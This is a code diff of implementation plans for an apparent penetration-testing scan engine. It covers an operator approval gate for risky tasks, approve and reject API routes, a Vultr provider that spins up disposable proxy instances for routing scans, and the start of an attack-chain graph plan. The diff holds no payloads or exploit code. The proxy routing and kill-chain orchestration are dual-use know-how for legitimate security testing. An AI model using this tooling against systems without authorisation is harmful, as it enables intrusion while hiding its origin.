+    ) -> TaskOutput:
+        self.executed.append(task.id)
+        return self._results.get(task.id, self._default)
+
+
+class FakeStore:
+    """Minimal in-memory store for approval gate testing."""
+
+    def __init__(self) -> None:
+        self._task_statuses: dict[str, dict[str, Any]] = {}
+
+    async def update_task_status(self, task_id: str, status: str, **fields) -> None:
+        self._task_statuses[task_id] = {"status": status, **fields}
+
+    async def get_task_status(self, task_id: str) ->
dict[str, Any] | None:
+        return self._task_statuses.get(task_id)
+
+
+def _make_scan() -> Scan:
+    return Scan(
+        id="scan-1", engagement_id="eng-1", target="10.0.0.1",
+        target_type=TargetType.NETWORK, status=ScanStatus.PENDING,
+        created_at=datetime.now(timezone.utc),
+    )
+
+
+def _make_gated_task(
+    task_id: str = "gated-task",
+    timeout_seconds: int = 3600,
+    description: str = "Dangerous action",
+) -> ScanTask:
+    return ScanTask(
+        id=task_id, scan_id="scan-1", name="gated",
+        tool="c2-agent", task_type=TaskType.SHELL,
+        command="echo approved",
+        requires_approval=ApprovalRequirement(
+            timeout_seconds=timeout_seconds,
+            description=description,
+        ),
+    )
+
+
+def _make_engine(
+    tasks: list[ScanTask],
+    executor: MockExecutor,
+    store: FakeStore | None = None,
+    registry: ApprovalRegistry | None = None,
+) -> ScanEngine:
+    pool = AdaptiveResourcePool(
+        global_limit=4,
+        group_limits={"approval_gate": 9999},
+    )
+    executors = {
+        TaskType.SHELL: executor,
+        TaskType.DOCKER_EXEC: executor,
+        TaskType.MCP_CALL: executor,
+    }
+    engine = ScanEngine(
+        scan=_make_scan(),
+        resource_pool=pool,
+        executors=executors,
+        event_bus=EventBus(),
+        cancellation=CancellationToken(),
+    )
+
+    if registry is not None:
+        engine.set_approval_registry(registry)
+    if store is not None:
+        engine.set_approval_store(store)
+
+    engine.load_tasks(tasks)
+    return engine
+
+
+class TestEngineApprovalGate:
+    @pytest.mark.asyncio
+    async def test_approved_task_executes(self):
+        """Gate approved → real executor fires → task completes."""
+        executor = MockExecutor()
+        store = FakeStore()
+        registry = ApprovalRegistry()
+        task = _make_gated_task(timeout_seconds=5)
+        engine = _make_engine([task], executor, store, registry)
+
+        async def approve_soon():
+            # Wait for the gate to register, then approve via store + signal
+            for _ in range(50):
+                await asyncio.sleep(0.05)
+                if registry.pending_ticket_ids():
+                    break
+            tickets = registry.pending_ticket_ids()
+            assert len(tickets) == 1
+            ticket_id = tickets.pop()
+            # Write-before-signal: persist to store first
+            await store.update_task_status(
+                task.id, "approved",
+                approval_ticket_id=ticket_id,
+            )
+            registry.signal(ticket_id)
+
+        asyncio.ensure_future(approve_soon())
+        await engine.run()
+
+        assert "gated-task" in executor.executed
+        assert engine._tasks["gated-task"].status == TaskStatus.COMPLETED
+
+    @pytest.mark.asyncio
+    async def test_rejected_task_fails(self):
+        """Gate rejected → executor never fires → task fails."""
+        executor = MockExecutor()
+        store = FakeStore()
+        registry = ApprovalRegistry()
+        task = _make_gated_task(timeout_seconds=5)
+        engine = _make_engine([task], executor, store, registry)
+
+        async def reject_soon():
+            for _ in range(50):
+                await asyncio.sleep(0.05)
+                if registry.pending_ticket_ids():
+                    break
+            ticket_id = registry.pending_ticket_ids().pop()
+            await store.update_task_status(
+                task.id, "rejected",
+                approval_ticket_id=ticket_id,
+            )
+            registry.signal(ticket_id)
+
+        asyncio.ensure_future(reject_soon())
+        await engine.run()
+
+        assert "gated-task" not in executor.executed
+        assert engine._tasks["gated-task"].status == TaskStatus.FAILED
+
+    @pytest.mark.asyncio
+    async def test_timeout_rejects_automatically(self):
+        """Gate times out → executor never fires → task fails."""
+        executor = MockExecutor()
+        store = FakeStore()
+        registry = ApprovalRegistry()
+        task = _make_gated_task(timeout_seconds=1)  # 1 second timeout
+        engine = _make_engine([task], executor, store, registry)
+
+        await engine.run()
+
+        assert "gated-task" not in executor.executed
+        assert engine._tasks["gated-task"].status == TaskStatus.FAILED
+        # Verify store was updated with expiry
+        stored = await store.get_task_status("gated-task")
+        assert stored is not None
+        assert stored["status"] == "approval_expired"
+
+    @pytest.mark.asyncio
+    async def test_non_gated_task_unaffected(self):
+        """Tasks without requires_approval execute normally."""
+ executor = MockExecutor() + task = ScanTask( + id="normal", scan_id="scan-1", name="normal", + tool="nmap", task_type=TaskType.SHELL, command="echo normal", + ) + engine = _make_engine([task], executor) + await engine.run() + + assert "normal" in executor.executed + assert engine._tasks["normal"].status == TaskStatus.COMPLETED + + @pytest.mark.asyncio + async def test_parallel_branches_continue_during_gate(self): + """Safe branch executes while gated branch is sleeping.""" + executor = MockExecutor() + store = FakeStore() + registry = ApprovalRegistry() + + safe_task = ScanTask( + id="safe", scan_id="scan-1", name="safe", + tool="nmap", task_type=TaskType.SHELL, command="echo safe", + ) + gated_task = _make_gated_task(timeout_seconds=1) + + engine = _make_engine([safe_task, gated_task], executor, store, registry) + await engine.run() + + # Safe branch ran immediately; gated branch timed out + assert "safe" in executor.executed + assert "gated-task" not in executor.executed + assert engine._tasks["safe"].status == TaskStatus.COMPLETED + assert engine._tasks["gated-task"].status == TaskStatus.FAILED + + @pytest.mark.asyncio + async def test_no_gate_without_registry(self): + """If no registry set, gated tasks execute immediately (no gate).""" + executor = MockExecutor() + task = _make_gated_task(timeout_seconds=5) + engine = _make_engine([task], executor) # no registry, no store + await engine.run() + + assert "gated-task" in executor.executed + assert engine._tasks["gated-task"].status == TaskStatus.COMPLETED +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_approval.py::TestEngineApprovalGate::test_non_gated_task_unaffected -v` +Expected: FAIL with `AttributeError: 'ScanEngine' object has no attribute 'set_approval_registry'` + +- [ ] **Step 3: Add approval fields to ScanEngine.__init__** + +In `packages/cli/src/opentools/scanner/engine.py`, add after the existing `_pipeline_results` 
field (around line 69): + +```python + # Approval gate (optional — engine works without it) + self._approval_registry: Any | None = None + self._approval_store: Any | None = None +``` + +Add public setters after the existing `set_cache` method: + +```python + def set_approval_registry(self, registry: Any) -> None: + """Set the ApprovalRegistry for HITL gate support.""" + self._approval_registry = registry + + def set_approval_store(self, store: Any) -> None: + """Set the store for persisting gate state.""" + self._approval_store = store +``` + +- [ ] **Step 4: Modify _execute_task — insert gate phase** + +Replace the existing `_execute_task` method (lines 215-251) with: + +```python + async def _execute_task( + self, task: ScanTask, executor: TaskExecutor + ) -> TaskOutput: + """Check cache → gate phase → acquire resource → dispatch to executor → release.""" + # Cache check + if task.cache_key and task.cache_key in self._cache: + return self._cache[task.cache_key] + + # --- GATE PHASE (if task requires approval and registry is configured) --- + if ( + task.requires_approval is not None + and self._approval_registry is not None + and self._approval_store is not None + ): + gate_result = await self._run_approval_gate(task) + if gate_result is not None: + return gate_result # rejected or expired + + # --- NORMAL EXECUTION --- + resource_group = task.resource_group or task.task_type.value + + if task.retry_policy is not None: + from opentools.shared.retry import execute_with_retry + + async def _attempt() -> TaskOutput: + await self._pool.acquire(task.id, task.priority, resource_group) + try: + return await executor.execute( + task, lambda _chunk: None, self._cancellation + ) + finally: + self._pool.release(resource_group) + + output = await execute_with_retry(_attempt, task.retry_policy) + else: + await self._pool.acquire(task.id, task.priority, resource_group) + try: + output = await executor.execute( + task, lambda _chunk: None, self._cancellation + ) + finally: + 
self._pool.release(resource_group) + + # Populate cache on success + if task.cache_key and output.exit_code == 0: + self._cache[task.cache_key] = output.model_copy(update={"cached": True}) + + return output + + async def _run_approval_gate(self, task: ScanTask) -> TaskOutput | None: + """Execute the approval gate phase. Returns None if approved (proceed), + or a TaskOutput if rejected/expired (stop).""" + import uuid + from datetime import datetime, timedelta, timezone + + timeout = task.requires_approval.timeout_seconds + ticket_id = f"gate-{task.id}-{uuid.uuid4().hex[:8]}" + expires_at = datetime.now(timezone.utc) + timedelta(seconds=timeout) + + # 1. Persist to store (source of truth) + task.approval_ticket_id = ticket_id + task.approval_expires_at = expires_at + await self._approval_store.update_task_status( + task.id, TaskStatus.AWAITING_APPROVAL.value, + approval_ticket_id=ticket_id, + approval_expires_at=expires_at.isoformat(), + ) + + # 2. Publish SSE event (if event bus supports it) + # The event bus is best-effort; failure here doesn't block the gate. + try: + self._event_bus.publish({ + "type": "approval_required", + "scan_id": self.scan.id, + "task_id": task.id, + "ticket_id": ticket_id, + "tool": task.tool, + "command": task.command, + "description": task.requires_approval.description, + "expires_at": expires_at.isoformat(), + }) + except Exception: + pass + + # 3. 
Register event and sleep + event = self._approval_registry.register(ticket_id) + + remaining = (expires_at - datetime.now(timezone.utc)).total_seconds() + if remaining <= 0: + self._approval_registry.remove(ticket_id) + await self._approval_store.update_task_status( + task.id, "approval_expired", + ) + return TaskOutput(exit_code=2, stderr="approval expired before gate could sleep") + + # Acquire from unlimited approval_gate group while sleeping + await self._pool.acquire(task.id, task.priority, "approval_gate") + try: + try: + await asyncio.wait_for(event.wait(), timeout=remaining) + except asyncio.TimeoutError: + pass # handled by DB read below + finally: + self._pool.release("approval_gate") + self._approval_registry.remove(ticket_id) + + # 4. READ TRUTH from store (never trust why we woke up) + stored = await self._approval_store.get_task_status(task.id) + if stored is not None: + status = stored.get("status", "") + else: + status = "" + + if status == "approved": + # Gate passed — update task status back to RUNNING and return None + # to signal _execute_task to proceed to the real executor + task.status = TaskStatus.RUNNING + return None + + if status == "rejected": + return TaskOutput( + exit_code=1, + stderr="rejected by operator", + ) + + # Timeout or unknown state + await self._approval_store.update_task_status( + task.id, "approval_expired", + ) + return TaskOutput( + exit_code=2, + stderr="approval expired", + ) +``` + +- [ ] **Step 5: Run integration tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_approval.py -v` +Expected: All PASS + +- [ ] **Step 6: Run existing engine tests for regression check** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine.py -v` +Expected: All PASS — no regressions. Tasks without `requires_approval` are unaffected. 
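The gate's core discipline — wake on signal or timeout, then let the persisted decision decide — can be exercised in isolation. A minimal sketch with a plain dict standing in for the SQLite store (all names here are illustrative, not part of the codebase):

```python
import asyncio


async def gate(event: asyncio.Event, store: dict, task_id: str, timeout: float) -> str:
    """Sleep until signaled or timed out, then read the authoritative store."""
    try:
        await asyncio.wait_for(event.wait(), timeout=timeout)
    except asyncio.TimeoutError:
        pass  # ignored on purpose: the store read below decides, not the wake reason
    return store.get(task_id, "approval_expired")


async def main() -> str:
    store: dict[str, str] = {}
    event = asyncio.Event()
    waiter = asyncio.create_task(gate(event, store, "t1", timeout=5.0))
    await asyncio.sleep(0)     # let the gate start waiting
    store["t1"] = "approved"   # write-before-signal: persist the decision first...
    event.set()                # ...then fire the in-memory tripwire
    return await waiter


result = asyncio.run(main())
print(result)  # approved
```

Because the decision is read from the store after the wake, a crash between write and signal loses nothing: the decision is already durable, and a timeout-driven wake reaches the same read.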
+ +- [ ] **Step 7: Commit** + +```bash +git add packages/cli/src/opentools/scanner/engine.py packages/cli/tests/test_scanner/test_engine_approval.py +git commit -m "feat(engine): integrate HITL approval gate phase into _execute_task" +``` + +--- + +### Task 13: FastAPI Gate Endpoints — List, Approve, Reject + +**Files:** +- Modify: `packages/web/backend/app/models.py:252-284` (add columns to ScanTaskRecord) +- Modify: `packages/web/backend/app/routes/scans.py` (add gate endpoints after cancel endpoint) +- Test: `packages/web/backend/tests/test_gate_routes.py` + +**Context:** The approve/reject routes enforce **write-before-signal**: they update the database first, then signal the in-memory event. The `ApprovalRegistry` singleton is stored in `_active_scans[scan_id]` alongside the engine reference, following the existing pattern at [api.py:199](packages/cli/src/opentools/scanner/api.py#L199). + +- [ ] **Step 1: Add approval columns to ScanTaskRecord** + +In `packages/web/backend/app/models.py`, add after line 284 (after `completed_at`): + +```python +class ScanTaskRecord(SQLModel, table=True): + # ... existing fields ... 
+ # Approval gate fields + approval_ticket_id: Optional[str] = None + approval_expires_at: Optional[datetime] = Field(default=None, **_TZ_KW) +``` + +- [ ] **Step 2: Add gate request/response models and endpoints to scans.py** + +Append to `packages/web/backend/app/routes/scans.py`, after the cancel endpoint (after line 380): + +```python +# --------------------------------------------------------------------------- +# Approval gate endpoints +# --------------------------------------------------------------------------- + + +class GateResponse(BaseModel): + ticket_id: str + task_id: str + tool: str + command: Optional[str] = None + description: str + status: str + expires_at: Optional[str] = None + + +class GateDecisionResponse(BaseModel): + ticket_id: str + decision: str + + +class GateRejectRequest(BaseModel): + reason: str = "operator rejected" + + +@router.get("/{scan_id}/gates") +async def list_pending_gates( + scan_id: str, + session: AsyncSession = Depends(get_db), + user: User = Depends(get_current_user), +): + """List tasks awaiting operator approval for a scan.""" + svc = ScanService(session, user) + scan = await svc.get_scan(scan_id) + if scan is None: + raise HTTPException(status_code=404, detail="Scan not found") + + tasks = await svc.get_scan_tasks(scan_id) + gates = [] + for t in tasks: + if t.status == "awaiting_approval" and t.approval_ticket_id: + gates.append(GateResponse( + ticket_id=t.approval_ticket_id, + task_id=t.id, + tool=t.tool, + command=t.command, + description="", # extracted from requires_approval JSON if available + status=t.status, + expires_at=t.approval_expires_at.isoformat() if t.approval_expires_at else None, + )) + return {"scan_id": scan_id, "gates": gates} + + +@router.post("/{scan_id}/gates/{ticket_id}/approve") +async def approve_gate( + scan_id: str, + ticket_id: str, + session: AsyncSession = Depends(get_db), + user: User = Depends(get_current_user), +): + """Approve a pending approval gate. 
Write-before-signal.""" + svc = ScanService(session, user) + + # 1. Validate + task_record = await svc.get_task_by_ticket(scan_id, ticket_id) + if task_record is None: + raise HTTPException(status_code=404, detail="Gate ticket not found") + if task_record.status != "awaiting_approval": + raise HTTPException( + status_code=409, + detail=f"Gate already resolved: {task_record.status}", + ) + + # 2. PERSIST FIRST (source of truth) + await svc.update_task_approval_status(task_record.id, "approved") + await session.commit() + + # 3. Signal event (best-effort tripwire) + from opentools.scanner.api import _active_scans + entry = _active_scans.get(scan_id, {}) + registry = entry.get("approval_registry") + if registry is not None: + registry.signal(ticket_id) + + return GateDecisionResponse(ticket_id=ticket_id, decision="approved") + + +@router.post("/{scan_id}/gates/{ticket_id}/reject") +async def reject_gate( + scan_id: str, + ticket_id: str, + body: GateRejectRequest = GateRejectRequest(), + session: AsyncSession = Depends(get_db), + user: User = Depends(get_current_user), +): + """Reject a pending approval gate. Write-before-signal.""" + svc = ScanService(session, user) + + # 1. Validate + task_record = await svc.get_task_by_ticket(scan_id, ticket_id) + if task_record is None: + raise HTTPException(status_code=404, detail="Gate ticket not found") + if task_record.status != "awaiting_approval": + raise HTTPException( + status_code=409, + detail=f"Gate already resolved: {task_record.status}", + ) + + # 2. PERSIST FIRST + await svc.update_task_approval_status(task_record.id, "rejected") + await session.commit() + + # 3. 
Signal event + from opentools.scanner.api import _active_scans + entry = _active_scans.get(scan_id, {}) + registry = entry.get("approval_registry") + if registry is not None: + registry.signal(ticket_id) + + return GateDecisionResponse(ticket_id=ticket_id, decision="rejected") +``` + +- [ ] **Step 3: Add helper methods to ScanService** + +These are the two new methods the gate routes need. Add to `packages/web/backend/app/services/scan_service.py`: + +```python + async def get_task_by_ticket( + self, scan_id: str, ticket_id: str + ) -> ScanTaskRecord | None: + """Find a task by its approval ticket ID within a scan.""" + from sqlalchemy import select + stmt = ( + select(ScanTaskRecord) + .where(ScanTaskRecord.scan_id == scan_id) + .where(ScanTaskRecord.approval_ticket_id == ticket_id) + ) + result = await self.session.execute(stmt) + return result.scalar_one_or_none() + + async def update_task_approval_status( + self, task_id: str, status: str + ) -> None: + """Update a task's status (for gate approval/rejection).""" + from sqlalchemy import update + stmt = ( + update(ScanTaskRecord) + .where(ScanTaskRecord.id == task_id) + .values(status=status) + ) + await self.session.execute(stmt) +``` + +- [ ] **Step 4: Write route tests** + +```python +# packages/web/backend/tests/test_gate_routes.py +"""Tests for approval gate API routes.""" + +import pytest +from httpx import AsyncClient + + +@pytest.mark.asyncio +async def test_list_gates_empty(client: AsyncClient, auth_headers: dict): + """No pending gates returns empty list.""" + # This test depends on the conftest fixtures creating a scan + # Minimal smoke test — full integration requires seeded data + resp = await client.get( + "/api/v1/scans/nonexistent/gates", headers=auth_headers, + ) + assert resp.status_code == 404 + + +@pytest.mark.asyncio +async def test_approve_missing_ticket(client: AsyncClient, auth_headers: dict): + resp = await client.post( + "/api/v1/scans/scan-1/gates/nonexistent/approve", + 
headers=auth_headers, + ) + assert resp.status_code == 404 + + +@pytest.mark.asyncio +async def test_reject_missing_ticket(client: AsyncClient, auth_headers: dict): + resp = await client.post( + "/api/v1/scans/scan-1/gates/nonexistent/reject", + headers=auth_headers, + json={"reason": "test"}, + ) + assert resp.status_code == 404 +``` + +- [ ] **Step 5: Run tests** + +Run: `cd packages/web/backend && python -m pytest tests/test_gate_routes.py -v` +Expected: PASS (404 cases) + +- [ ] **Step 6: Commit** + +```bash +git add packages/web/backend/app/models.py packages/web/backend/app/routes/scans.py packages/web/backend/app/services/scan_service.py packages/web/backend/tests/test_gate_routes.py +git commit -m "feat(api): add HITL gate endpoints — list, approve, reject with write-before-signal" +``` + +--- + +## Task 6b: Vultr Provider + +### Task 6b: VultrProvider Implementation + +**Files:** +- Create: `packages/cli/src/opentools/scanner/infra/vultr.py` +- Test: `packages/cli/tests/test_scanner/test_infra_vultr.py` + +**Context:** Implements `CloudNodeProvider` ABC (defined in Phase B Task 6). Uses `httpx.AsyncClient` with `MockTransport` for testing. The `sshkey_id` array is a hard requirement in the creation payload — without it, the instance boots with no authorized keys and the SSH tunnel fails. 
+ +- [ ] **Step 1: Write failing tests for VultrProvider** + +```python +# packages/cli/tests/test_scanner/test_infra_vultr.py +"""Tests for VultrProvider — ephemeral Vultr instance provisioning.""" + +import json + +import httpx +import pytest + +from opentools.scanner.infra.provider import ( + ProvisioningError, + ProvisioningTimeout, +) +from opentools.scanner.infra.vultr import VultrProvider + + +class TestVultrProviderCreate: + @pytest.mark.asyncio + async def test_create_sends_correct_payload(self): + captured = {} + + async def handler(request: httpx.Request) -> httpx.Response: + captured["body"] = json.loads(request.content) + captured["url"] = str(request.url) + return httpx.Response(202, json={ + "instance": {"id": "vtr-abc123"}, + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient( + transport=transport, + base_url="https://api.vultr.com/v2", + ) + provider = VultrProvider(client=client) + + result = await provider.create_node( + region="ewr", + ssh_public_key="ssh-key-uuid-1234", + tags=["opentools-ephemeral-proxy", "scan:scan-1"], + ) + + assert result == "vtr-abc123" + body = captured["body"] + assert body["region"] == "ewr" + assert body["plan"] == "vc2-1c-0.5gb" + assert body["os_id"] == 2284 + assert body["sshkey_id"] == ["ssh-key-uuid-1234"] + assert "opentools-ephemeral-proxy" in body["tags"] + assert body["backups"] == "disabled" + assert body["activation_email"] is False + + @pytest.mark.asyncio + async def test_create_returns_instance_id(self): + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(202, json={ + "instance": {"id": "vtr-def456"}, + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + result = await provider.create_node("lax", "key-id", ["tag"]) + assert result == "vtr-def456" + + +class TestVultrProviderPoll: + @pytest.mark.asyncio + async def 
test_active_with_ip(self): + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={ + "instance": { + "id": "vtr-abc", + "status": "active", + "power_status": "running", + "main_ip": "149.28.1.1", + }, + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + status, ip = await provider.poll_status("vtr-abc") + assert status == "active" + assert ip == "149.28.1.1" + + @pytest.mark.asyncio + async def test_active_with_zero_ip_is_creating(self): + """Vultr reports active before IP is assigned — treat as creating.""" + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={ + "instance": { + "id": "vtr-abc", + "status": "active", + "power_status": "running", + "main_ip": "0.0.0.0", + }, + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + status, ip = await provider.poll_status("vtr-abc") + assert status == "creating" + assert ip is None + + @pytest.mark.asyncio + async def test_pending_status(self): + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={ + "instance": { + "id": "vtr-abc", + "status": "pending", + "power_status": "stopped", + "main_ip": "0.0.0.0", + }, + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + status, ip = await provider.poll_status("vtr-abc") + assert status == "creating" + assert ip is None + + +class TestVultrProviderDestroy: + @pytest.mark.asyncio + async def test_destroy_204(self): + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(204) + + transport = httpx.MockTransport(handler) + client = 
httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + await provider.destroy_node("vtr-abc") # should not raise + + @pytest.mark.asyncio + async def test_destroy_404_idempotent(self): + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(404) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + await provider.destroy_node("vtr-abc") # should not raise + + +class TestVultrProviderListByTag: + @pytest.mark.asyncio + async def test_list_nodes_by_tag(self): + async def handler(request: httpx.Request) -> httpx.Response: + assert "tag=opentools-ephemeral-proxy" in str(request.url) + return httpx.Response(200, json={ + "instances": [ + {"id": "vtr-1"}, + {"id": "vtr-2"}, + ], + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + ids = await provider.list_nodes_by_tag("opentools-ephemeral-proxy") + assert ids == ["vtr-1", "vtr-2"] + + @pytest.mark.asyncio + async def test_list_empty(self): + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={"instances": []}) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + ids = await provider.list_nodes_by_tag("opentools-ephemeral-proxy") + assert ids == [] + + +class TestVultrProviderWaitUntilReady: + @pytest.mark.asyncio + async def test_waits_for_ip_assignment(self): + call_count = 0 + + async def handler(request: httpx.Request) -> httpx.Response: + nonlocal call_count + call_count += 1 + if call_count < 3: + return httpx.Response(200, json={ + "instance": { + "id": "vtr-abc", "status": "active", + "power_status": 
"running", "main_ip": "0.0.0.0", + }, + }) + return httpx.Response(200, json={ + "instance": { + "id": "vtr-abc", "status": "active", + "power_status": "running", "main_ip": "149.28.1.1", + }, + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + ip = await provider.wait_until_ready("vtr-abc", poll_interval=0.01, max_polls=10) + assert ip == "149.28.1.1" + assert call_count == 3 + + @pytest.mark.asyncio + async def test_timeout_raises(self): + async def handler(request: httpx.Request) -> httpx.Response: + return httpx.Response(200, json={ + "instance": { + "id": "vtr-abc", "status": "pending", + "power_status": "stopped", "main_ip": "0.0.0.0", + }, + }) + + transport = httpx.MockTransport(handler) + client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2") + provider = VultrProvider(client=client) + + with pytest.raises(ProvisioningTimeout): + await provider.wait_until_ready("vtr-abc", poll_interval=0.01, max_polls=3) +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_vultr.py::TestVultrProviderCreate::test_create_sends_correct_payload -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement VultrProvider** + +```python +# packages/cli/src/opentools/scanner/infra/vultr.py +"""VultrProvider — ephemeral Vultr instance provisioning via REST API. + +Implements CloudNodeProvider ABC. Uses httpx.AsyncClient for all HTTP +calls — fully async, never blocks the event loop. + +IMPORTANT: The sshkey_id array is REQUIRED in the creation payload. +Without it, the instance boots with no authorized SSH keys and the +automated tunnel establishment will fail with Permission denied. 
+""" + +from __future__ import annotations + +import uuid + +import httpx + +from opentools.scanner.infra.provider import CloudNodeProvider + + +class VultrProvider(CloudNodeProvider): + """Provision ephemeral instances via the Vultr API.""" + + def __init__(self, client: httpx.AsyncClient) -> None: + self._client = client + + @classmethod + def from_token(cls, api_token: str) -> VultrProvider: + """Create a provider with a new httpx client using the given API token.""" + client = httpx.AsyncClient( + base_url="https://api.vultr.com/v2", + headers={"Authorization": f"Bearer {api_token}"}, + timeout=30.0, + ) + return cls(client=client) + + async def create_node( + self, region: str, ssh_public_key: str, tags: list[str], + ) -> str: + """Create a Vultr instance. ssh_public_key must be a Vultr SSH key UUID.""" + resp = await self._client.post("/instances", json={ + "region": region, + "plan": "vc2-1c-0.5gb", + "os_id": 2284, # Ubuntu 24.04 LTS + "label": f"ot-proxy-{uuid.uuid4().hex[:8]}", + "sshkey_id": [ssh_public_key], + "tags": tags, + "backups": "disabled", + "activation_email": False, + }) + resp.raise_for_status() + return resp.json()["instance"]["id"] + + async def poll_status(self, provider_id: str) -> tuple[str, str | None]: + """Poll instance status. Returns ("active", ip) only when IP is assigned.""" + resp = await self._client.get(f"/instances/{provider_id}") + resp.raise_for_status() + instance = resp.json()["instance"] + + vultr_status = instance.get("status", "") + power_status = instance.get("power_status", "") + main_ip = instance.get("main_ip", "0.0.0.0") + + # Vultr can report "active" before IP is assigned + if ( + vultr_status == "active" + and power_status == "running" + and main_ip != "0.0.0.0" + ): + return "active", main_ip + + return "creating", None + + async def destroy_node(self, provider_id: str) -> None: + """Destroy a Vultr instance. 
Idempotent — 404 is not an error.""" + resp = await self._client.delete(f"/instances/{provider_id}") + if resp.status_code not in (204, 404): + resp.raise_for_status() + + async def list_nodes_by_tag(self, tag: str) -> list[str]: + """List all instance IDs with the given tag (for orphan sweeping).""" + resp = await self._client.get("/instances", params={"tag": tag}) + resp.raise_for_status() + instances = resp.json().get("instances", []) + return [inst["id"] for inst in instances] +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_vultr.py -v` +Expected: All PASS + +- [ ] **Step 5: Commit** + +```bash +git add packages/cli/src/opentools/scanner/infra/vultr.py packages/cli/tests/test_scanner/test_infra_vultr.py +git commit -m "feat(infra): add VultrProvider with SSH key injection and 0.0.0.0 IP guard" +``` + +--- + +## Appendix: Combined Build Order (All Phases) + +For reference, here is the complete task sequence across all three phases: + +**Phase A — Dynamic DAG Mutation (existing plan)** +1. KillChainState + IntelBundle models +2. OutputAnalyzer protocol + NmapAnalyzer +3. MutationStrategy protocol + RedisProbeStrategy +4. Engine integration (mutation layer in `_mark_completed`) + +**Phase B — Ephemeral Proxy Routing (existing plan)** +5. Add `env` param to `run_streaming` +6. CloudNodeProvider ABC + DigitalOcean implementation +6b. **VultrProvider implementation** ← NEW +7. `ephemeral_proxy` context manager + shielded teardown +8. ProxiedShellExecutor +9. Orphan sweeper + +**Phase C — HITL Approval Gate** ← NEW +10. Model additions (ApprovalRequirement, AWAITING_APPROVAL, ScanTask fields) +11. ApprovalRegistry (in-memory notification hub) +12. Engine integration (gate phase in `_execute_task`) +13. 
FastAPI gate endpoints (list, approve, reject) diff --git a/docs/superpowers/plans/2026-04-13-phase3c2-attack-chain-graph-view.md b/docs/superpowers/plans/2026-04-13-phase3c2-attack-chain-graph-view.md new file mode 100644 index 0000000..88b0dd1 --- /dev/null +++ b/docs/superpowers/plans/2026-04-13-phase3c2-attack-chain-graph-view.md @@ -0,0 +1,1865 @@ +# Phase 3C.2: Attack Chain Graph View — Implementation Plan + +> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Add an interactive per-engagement attack chain graph visualization to the web dashboard, with edge curation (confirm/reject), MITRE ATT&CK phase coloring, and server-side filtering for scale. + +**Architecture:** Standalone Vue page at `/engagements/:id/chain` wraps `force-graph` (vasturiano). Backend serves filtered subgraphs via a new `GET /api/chain/subgraph` endpoint that caps nodes and filters by severity/status. Edge curation uses `PATCH /api/chain/relations/:id`. No new database tables — builds on 3C.1 models. 
+ +**Tech Stack:** FastAPI, SQLAlchemy async, Vue 3, PrimeVue, `force-graph` (vasturiano), TanStack Query + +**Spec:** `docs/superpowers/specs/2026-04-13-phase3c2-attack-chain-graph-view-design.md` + +--- + +## File Map + +### Backend (new/modified) + +| File | Action | Responsibility | +|------|--------|---------------| +| `packages/web/backend/app/routes/chain.py` | Modify | Add `GET /api/chain/subgraph` and `PATCH /api/chain/relations/{relation_id}` endpoints | +| `packages/web/backend/app/services/chain_service.py` | Modify | Add `subgraph_for_engagement()` and `update_relation_status()` methods | +| `packages/web/backend/app/services/chain_dto.py` | Modify | Add `relation_to_link_dict()` for force-graph link shape with drift computation | +| `packages/web/backend/tests/test_chain_subgraph.py` | Create | Tests for subgraph endpoint filtering, capping, neighborhood, drift | +| `packages/web/backend/tests/test_chain_curation.py` | Create | Tests for relation PATCH (valid transitions, invalid status, auth scoping) | + +### Frontend (new/modified) + +| File | Action | Responsibility | +|------|--------|---------------| +| `packages/web/frontend/src/views/ChainGraphView.vue` | Create | Page component — data fetching, filter state, layout orchestration | +| `packages/web/frontend/src/components/ForceGraphCanvas.vue` | Create | Wrapper around `force-graph` — rendering config, custom draw callbacks, interaction events | +| `packages/web/frontend/src/components/ChainDetailPanel.vue` | Create | Right drawer — node details, edge details with reasons, curation buttons | +| `packages/web/frontend/src/components/ChainFilterToolbar.vue` | Create | Severity/status toggle buttons | +| `packages/web/frontend/src/components/ChainLegend.vue` | Create | Bottom bar — severity color key, edge style key, node count | +| `packages/web/frontend/src/components/ChainEmptyState.vue` 